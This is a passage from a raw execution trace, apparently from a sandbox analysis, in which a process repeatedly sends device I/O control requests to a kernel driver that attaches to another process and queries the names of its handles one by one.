nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.611] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.611] PsAcquireProcessExitSynchronization () returned 0x0 [0132.611] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.611] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001295e10, HandleInformation=0x0) returned 0x0 [0132.611] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.611] PsReleaseProcessExitSynchronization () returned 0x2 [0132.611] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.611] ObQueryNameString (in: Object=0xfffff8a001295e10, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.611] ObfDereferenceObject (Object=0xfffff8a001295e10) returned 0x1 [0132.611] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.611] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.611] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.611] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.611] PsAcquireProcessExitSynchronization () returned 0x0 [0132.611] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.612] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0012565f0, HandleInformation=0x0) returned 0x0 [0132.612] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.612] PsReleaseProcessExitSynchronization () returned 0x2 [0132.612] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.612] ObQueryNameString (in: Object=0xfffff8a0012565f0, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.612] ObfDereferenceObject (Object=0xfffff8a0012565f0) returned 0x1 [0132.612] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.612] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.612] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.612] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.612] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.612] PsAcquireProcessExitSynchronization () returned 0x0 [0132.612] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.612] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00124d9a0, HandleInformation=0x0) returned 0x0 [0132.612] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.612] PsReleaseProcessExitSynchronization () returned 0x2 [0132.613] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.613] ObQueryNameString (in: Object=0xfffff8a00124d9a0, ObjectNameInfo=0xfffffa8002640044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002640044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.613] ObfDereferenceObject (Object=0xfffff8a00124d9a0) returned 0x1 [0132.613] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.613] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.613] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.613] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.613] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.613] PsAcquireProcessExitSynchronization () returned 0x0 [0132.613] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.982] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013bf060, HandleInformation=0x0) returned 0x0 [0132.982] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.982] PsReleaseProcessExitSynchronization () returned 0x2 [0132.982] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.982] ObQueryNameString (in: Object=0xfffff8a0013bf060, ObjectNameInfo=0xfffffa8002656044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002656044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.983] ObfDereferenceObject (Object=0xfffff8a0013bf060) returned 0x1 [0132.983] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.983] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.983] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.983] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.983] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.983] PsAcquireProcessExitSynchronization () returned 0x0 [0132.983] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.983] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001226d00, HandleInformation=0x0) returned 0x0 [0132.983] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.983] PsReleaseProcessExitSynchronization () returned 0x2 [0132.983] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.983] ObQueryNameString (in: Object=0xfffff8a001226d00, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.983] ObfDereferenceObject (Object=0xfffff8a001226d00) returned 0x1 [0132.984] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.984] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.984] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.984] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.984] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.984] PsAcquireProcessExitSynchronization () returned 0x0 [0132.984] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.984] ObReferenceObjectByHandle (in: Handle=0x2a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001232060, HandleInformation=0x0) returned 0x0 [0132.984] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.984] PsReleaseProcessExitSynchronization () returned 0x2 [0132.984] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.984] ObQueryNameString (in: Object=0xfffff8a001232060, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.984] ObfDereferenceObject (Object=0xfffff8a001232060) returned 0x1 [0132.984] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.984] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.984] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.984] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.984] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.985] PsAcquireProcessExitSynchronization () returned 0x0 [0132.985] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.985] ObReferenceObjectByHandle (in: Handle=0x2a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001254f80, HandleInformation=0x0) returned 0x0 [0132.985] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.985] PsReleaseProcessExitSynchronization () returned 0x2 [0132.985] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.985] ObQueryNameString (in: Object=0xfffff8a001254f80, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.985] ObfDereferenceObject (Object=0xfffff8a001254f80) returned 0x1 [0132.985] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.985] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.985] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.985] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.985] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.985] PsAcquireProcessExitSynchronization () returned 0x0 [0132.985] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.985] ObReferenceObjectByHandle (in: Handle=0x2ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001419fc0, HandleInformation=0x0) returned 0x0 [0132.985] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.985] PsReleaseProcessExitSynchronization () returned 0x2 [0132.985] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.985] ObQueryNameString (in: Object=0xfffff8a001419fc0, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.986] ObfDereferenceObject (Object=0xfffff8a001419fc0) returned 0x1 [0132.986] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.986] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.986] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.986] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.986] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.986] PsAcquireProcessExitSynchronization () returned 0x0 [0132.986] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.986] ObReferenceObjectByHandle (in: Handle=0x2b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013eccf0, HandleInformation=0x0) returned 0x0 [0132.986] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.986] PsReleaseProcessExitSynchronization () returned 0x2 [0132.986] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.986] ObQueryNameString (in: Object=0xfffff8a0013eccf0, ObjectNameInfo=0xfffffa8002540344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002540344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.986] ObfDereferenceObject (Object=0xfffff8a0013eccf0) returned 0x1 [0132.986] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.986] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.986] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.986] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.986] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.986] PsAcquireProcessExitSynchronization () returned 0x0 [0132.986] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.987] ObReferenceObjectByHandle (in: Handle=0x2bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001076c50, HandleInformation=0x0) returned 0x0 [0132.987] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.987] PsReleaseProcessExitSynchronization () returned 0x2 [0132.987] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.987] ObQueryNameString (in: Object=0xfffff8a001076c50, ObjectNameInfo=0xfffffa8002f06044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f06044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.987] ObfDereferenceObject (Object=0xfffff8a001076c50) returned 0x1 [0132.987] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.987] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.987] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.987] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.987] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.987] PsAcquireProcessExitSynchronization () returned 0x0 [0132.987] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.987] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00184c750, HandleInformation=0x0) returned 0x0 [0132.987] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.987] PsReleaseProcessExitSynchronization () returned 0x2 [0132.987] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.987] ObQueryNameString (in: Object=0xfffff8a00184c750, ObjectNameInfo=0xfffffa8002f2d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.987] ObfDereferenceObject (Object=0xfffff8a00184c750) returned 0x1 [0132.988] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.988] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.988] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.988] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.988] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.988] PsAcquireProcessExitSynchronization () returned 0x0 [0132.988] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.988] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013dca30, HandleInformation=0x0) returned 0x0 [0132.988] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.988] PsReleaseProcessExitSynchronization () returned 0x2 [0132.988] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.988] ObQueryNameString (in: Object=0xfffff8a0013dca30, ObjectNameInfo=0xfffffa8002f5d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.988] ObfDereferenceObject (Object=0xfffff8a0013dca30) returned 0x1 [0132.988] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.988] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.988] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.988] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.989] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.989] PsAcquireProcessExitSynchronization () returned 0x0 [0132.989] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.989] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001418e70, HandleInformation=0x0) returned 0x0 [0132.989] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.989] PsReleaseProcessExitSynchronization () returned 0x2 [0132.989] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.989] ObQueryNameString (in: Object=0xfffff8a001418e70, ObjectNameInfo=0xfffffa800289c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.989] ObfDereferenceObject (Object=0xfffff8a001418e70) returned 0x1 [0132.989] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.989] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.989] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.989] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.989] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.989] PsAcquireProcessExitSynchronization () returned 0x0 [0132.989] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.989] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001465720, HandleInformation=0x0) returned 0x0 [0132.989] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.989] PsReleaseProcessExitSynchronization () returned 0x2 [0132.989] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.989] ObQueryNameString (in: Object=0xfffff8a001465720, ObjectNameInfo=0xfffffa8002f5b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.990] ObfDereferenceObject (Object=0xfffff8a001465720) returned 0x1 [0132.990] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.990] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.990] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.990] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.990] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.990] PsAcquireProcessExitSynchronization () returned 0x0 [0132.990] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.990] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00146ba30, HandleInformation=0x0) returned 0x0 [0132.990] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.990] PsReleaseProcessExitSynchronization () returned 0x2 [0132.990] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0132.990] ObQueryNameString (in: Object=0xfffff8a00146ba30, ObjectNameInfo=0xfffffa8002f57044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f57044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.990] ObfDereferenceObject (Object=0xfffff8a00146ba30) returned 0x1 [0132.990] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.990] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.990] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.990] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.991] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.991] PsAcquireProcessExitSynchronization () returned 0x0 [0132.991] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.991] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: 